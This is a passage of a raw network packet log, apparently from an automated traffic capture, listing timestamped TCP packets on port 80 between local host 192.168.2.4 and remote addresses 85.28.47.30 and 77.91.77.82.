                                                                Jul 5, 2024 04:23:18.388407946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388410091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388418913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388428926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388432980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388448000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388449907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388478994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388494015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388675928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388686895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388698101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388709068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388714075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388720036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388724089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388731003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388741016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388742924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388752937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388762951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388772964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388775110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388786077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388787031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388798952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388807058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388809919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388820887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388825893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388833046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388844013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388849020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388855934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388865948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388870001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388878107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388892889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388899088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388933897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389067888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389080048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389089108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389101982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389111996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389112949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389125109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389133930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389136076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389142990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389147043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389153957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389168978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389175892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389183044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389192104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389205933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389209032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389218092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389230967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389236927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389242887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389251947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389254093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389266014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389266968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389278889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389288902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389293909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389298916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389311075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389321089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389327049 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389333963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389343023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389355898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389383078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389552116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389564037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389573097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.389596939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.389607906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.402208090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402219057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402226925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402266979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.402359009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402371883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402383089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402394056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402405024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.402416945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.402431011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.402507067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.402542114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475605965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475650072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475692034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475697041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475709915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475723028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475729942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475740910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475749969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475754023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475763083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475764990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475776911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475800991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475858927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475867987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475873947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475881100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475908995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475934029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475944996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475954056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475965977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.475970984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.475977898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476001978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476089954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476150036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476161003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476188898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476232052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476246119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476255894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476269960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476270914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476284027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476291895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476296902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476303101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476304054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476310015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476320028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476330996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476340055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476342916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476357937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476367950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476382017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476423979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476437092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476447105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476459026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476465940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476471901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476484060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476489067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476502895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476536036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476560116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476569891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476581097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476591110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476599932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476603031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476613998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476619959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476628065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476639986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476777077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476799965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476810932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476819992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476819992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476831913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476833105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476843119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476845026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476855993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476862907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476866961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476881027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476885080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476891994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476905107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476917982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.476967096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476978064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476988077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.476999044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477001905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477010012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477010965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477022886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477030039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477035046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477046013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477051020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477056026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477056980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477080107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477080107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477092028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477180004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477190971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477201939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477211952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477217913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477227926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477232933 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477240086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477245092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477252007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477262974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477263927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477274895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477277040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477287054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477304935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477314949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477371931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477382898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477392912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477406025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477411032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477417946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477428913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477435112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477440119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477444887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477452993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477464914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477464914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477478027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477495909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477505922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.477529049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477540016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.477576017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478414059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478424072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478430033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478458881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478485107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478496075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478507042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478517056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478518963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478528976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478537083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478549957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478560925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478570938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478580952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478590012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478605986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478612900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478616953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478629112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478632927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478645086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478662968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478735924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478746891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478755951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478766918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478777885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478784084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478794098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478796959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478810072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478812933 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478821039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478833914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478844881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478863001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478869915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478880882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478889942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478899956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478910923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478913069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478924990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478936911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478956938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.478987932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.478997946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.479007006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.479026079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.479034901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.479053974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.492888927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.492927074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.492938042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.492985010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.493005991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.493016005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.493022919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.493032932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.493042946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.493047953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.493056059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.493078947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.515405893 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.515456915 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.566719055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566731930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566741943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566761971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566771984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566775084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566786051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566790104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566802979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566812992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566823959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566827059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566833973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566859961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566870928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566881895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566891909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566903114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566904068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566921949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566921949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566936016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.566936970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566961050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.566982985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567018032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567143917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567154884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567173958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567186117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567187071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567200899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567209959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567213058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567234039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567256927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567274094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567284107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567296028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567306995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567306995 CEST4973280192.168.2.485.28.47.30
